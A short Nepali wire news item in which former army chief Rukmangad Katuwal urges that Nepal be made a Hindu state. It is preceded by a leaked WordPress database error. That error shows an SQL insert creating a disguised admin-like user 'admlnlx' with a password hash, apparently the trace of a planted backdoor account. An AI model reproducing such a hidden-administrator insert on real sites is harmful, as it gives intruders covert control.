WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B3AWBZVEc0DmDOPLscUCpYgEtnDiSN0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 09:58:56', '', 'admlnlx', 'admlnlx')
पाँचथर, माघ ८ –
पूर्व प्रधानसेनापति रुक्माङ्गत कटवालले हिन्दू धर्म राष्ट्रको पहिचान भएकाले देशलाई हिन्दू राज्य कायम गर्न सबै नेपाली लाग्नुपर्ने बताउनुभएको छ ।
पाँचथरको फिदिममा शनिबार राष्ट्रिय हिन्दू एकता मञ्च नेपालको आयोजनामा भएको कार्यक्रममा बोल्दै उहाँले हिन्दू राज्य सबै दलको भएकाले हिन्दू निरपेक्ष भन्ने शब्दलाई हटाएर संविधान संशोधनमार्फत भए पनि हिन्दू सापेक्ष भन्ने शब्द थप्नसमेत उहाँले आग्रह गर्नुभयो ।
यस्तै गरिबी र अशिक्षाका कारण धर्म परिवर्तन गराउन खोज्ने जो कोहीलाई राज्यले दण्डित गर्नुपर्ने उहाँको भनाई थियो । सभामा मञ्चका केन्द्रीय अध्यक्ष इन्द्रप्रसाद ओली, धार्मिक व्यक्तित्व अशोक सुब्बालगायतले सम्बोधन गर्नुभएको थियो । रासस